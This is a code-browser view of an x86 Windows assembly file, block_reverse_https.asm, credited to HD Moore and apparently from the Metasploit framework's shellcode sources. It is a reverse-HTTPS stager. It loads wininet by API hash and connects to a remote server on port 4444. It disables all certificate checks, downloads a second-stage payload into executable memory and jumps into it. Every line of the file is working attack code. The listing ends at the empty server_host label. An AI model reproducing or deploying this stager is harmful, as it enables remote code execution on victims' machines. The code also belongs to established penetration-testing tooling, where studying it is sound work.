root / external / source / shellcode / windows / x86 / src / block / block_reverse_https.asm @ master
History | View | Annotate | Download (5.5 kB)
| 1 |
;-----------------------------------------------------------------------------; |
|---|---|
| 2 |
; Author: HD Moore |
| 3 |
; Compatible: Confirmed Windows 7, Windows 2008 Server, Windows XP SP1, Windows SP3, Windows 2000 |
| 4 |
; Known Bugs: Incompatible with Windows NT 4.0, buggy on Windows XP Embedded (SP1) |
| 5 |
; Version: 1.0 |
| 6 |
;-----------------------------------------------------------------------------; |
| 7 |
[BITS 32] |
| 8 |
|
| 9 |
; Input: EBP must be the address of 'api_call'. |
| 10 |
; Output: EDI will be the socket for the connection to the server |
| 11 |
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0) |
| 12 |
load_wininet: |
| 13 |
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack. |
| 14 |
push 0x696e6977 ; ... |
| 15 |
push esp ; Push a pointer to the "wininet" string on the stack. |
| 16 |
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" ) |
| 17 |
call ebp ; LoadLibraryA( "wininet" ) |
| 18 |
|
| 19 |
internetopen: |
| 20 |
xor edi,edi |
| 21 |
push edi ; DWORD dwFlags |
| 22 |
push edi ; LPCTSTR lpszProxyBypass |
| 23 |
push edi ; LPCTSTR lpszProxyName |
| 24 |
push edi ; DWORD dwAccessType (PRECONFIG = 0) |
| 25 |
push byte 0 ; NULL pointer |
| 26 |
push esp ; LPCTSTR lpszAgent ("\x00")
|
| 27 |
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) |
| 28 |
call ebp |
| 29 |
|
| 30 |
jmp short dbl_get_server_host |
| 31 |
|
| 32 |
internetconnect: |
| 33 |
pop ebx ; Save the hostname pointer |
| 34 |
xor ecx, ecx |
| 35 |
push ecx ; DWORD_PTR dwContext (NULL) |
| 36 |
push ecx ; dwFlags |
| 37 |
push byte 3 ; DWORD dwService (INTERNET_SERVICE_HTTP) |
| 38 |
push ecx ; password |
| 39 |
push ecx ; username |
| 40 |
push dword 4444 ; PORT |
| 41 |
push ebx ; HOSTNAME |
| 42 |
push eax ; HINTERNET hInternet |
| 43 |
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" ) |
| 44 |
call ebp |
| 45 |
|
| 46 |
jmp get_server_uri |
| 47 |
|
| 48 |
httpopenrequest: |
| 49 |
pop ecx |
| 50 |
xor edx, edx ; NULL |
| 51 |
push edx ; dwContext (NULL) |
| 52 |
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags |
| 53 |
;0x80000000 | ; INTERNET_FLAG_RELOAD |
| 54 |
;0x04000000 | ; INTERNET_NO_CACHE_WRITE |
| 55 |
;0x00800000 | ; INTERNET_FLAG_SECURE |
| 56 |
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT |
| 57 |
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
| 58 |
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
| 59 |
;0x00000200 ; INTERNET_FLAG_NO_UI |
| 60 |
push edx ; accept types |
| 61 |
push edx ; referrer |
| 62 |
push edx ; version |
| 63 |
push ecx ; url |
| 64 |
push edx ; method |
| 65 |
push eax ; hConnection |
| 66 |
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" ) |
| 67 |
call ebp |
| 68 |
mov esi, eax ; hHttpRequest |
| 69 |
|
| 70 |
set_retry: |
| 71 |
push byte 0x10 |
| 72 |
pop ebx |
| 73 |
|
| 74 |
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) ); |
| 75 |
set_security_options: |
| 76 |
push 0x00003380 |
| 77 |
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
| 78 |
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
| 79 |
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE |
| 80 |
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA |
| 81 |
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION |
| 82 |
mov eax, esp |
| 83 |
push byte 4 ; sizeof(dwFlags) |
| 84 |
push eax ; &dwFlags |
| 85 |
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS) |
| 86 |
push esi ; hRequest |
| 87 |
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" ) |
| 88 |
call ebp |
| 89 |
|
| 90 |
httpsendrequest: |
| 91 |
xor edi, edi |
| 92 |
push edi ; optional length |
| 93 |
push edi ; optional |
| 94 |
push edi ; dwHeadersLength |
| 95 |
push edi ; headers |
| 96 |
push esi ; hHttpRequest |
| 97 |
push 0x7B18062D ; hash( "wininet.dll", "HttpSendRequestA" ) |
| 98 |
call ebp |
| 99 |
test eax,eax |
| 100 |
jnz short allocate_memory |
| 101 |
|
| 102 |
try_it_again: |
| 103 |
dec ebx |
| 104 |
jz failure |
| 105 |
jmp short set_security_options |
| 106 |
|
| 107 |
dbl_get_server_host: |
| 108 |
jmp get_server_host |
| 109 |
|
| 110 |
get_server_uri: |
| 111 |
call httpopenrequest |
| 112 |
|
| 113 |
server_uri: |
| 114 |
db "/12345", 0x00 |
| 115 |
|
| 116 |
failure: |
| 117 |
push 0x56A2B5F0 ; hardcoded to exitprocess for size |
| 118 |
call ebp |
| 119 |
|
| 120 |
allocate_memory: |
| 121 |
push byte 0x40 ; PAGE_EXECUTE_READWRITE |
| 122 |
push 0x1000 ; MEM_COMMIT |
| 123 |
push 0x00400000 ; Stage allocation (8Mb ought to do us) |
| 124 |
push edi ; NULL as we dont care where the allocation is (zero'd from the prev function) |
| 125 |
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" ) |
| 126 |
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); |
| 127 |
|
| 128 |
download_prep: |
| 129 |
xchg eax, ebx ; place the allocated base address in ebx |
| 130 |
push ebx ; store a copy of the stage base address on the stack |
| 131 |
push ebx ; temporary storage for bytes read count |
| 132 |
mov edi, esp ; &bytesRead |
| 133 |
|
| 134 |
download_more: |
| 135 |
push edi ; &bytesRead |
| 136 |
push 8192 ; read length |
| 137 |
push ebx ; buffer |
| 138 |
push esi ; hRequest |
| 139 |
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" ) |
| 140 |
call ebp |
| 141 |
|
| 142 |
test eax,eax ; download failed? (optional?) |
| 143 |
jz failure |
| 144 |
|
| 145 |
mov eax, [edi] |
| 146 |
add ebx, eax ; buffer += bytes_received |
| 147 |
|
| 148 |
test eax,eax ; optional? |
| 149 |
jnz download_more ; continue until it returns 0 |
| 150 |
pop eax ; clear the temporary storage |
| 151 |
|
| 152 |
execute_stage: |
| 153 |
ret ; dive into the stored stage address |
| 154 |
|
| 155 |
get_server_host: |
| 156 |
call internetconnect |
| 157 |
|
| 158 |
server_host: |
| 159 |
|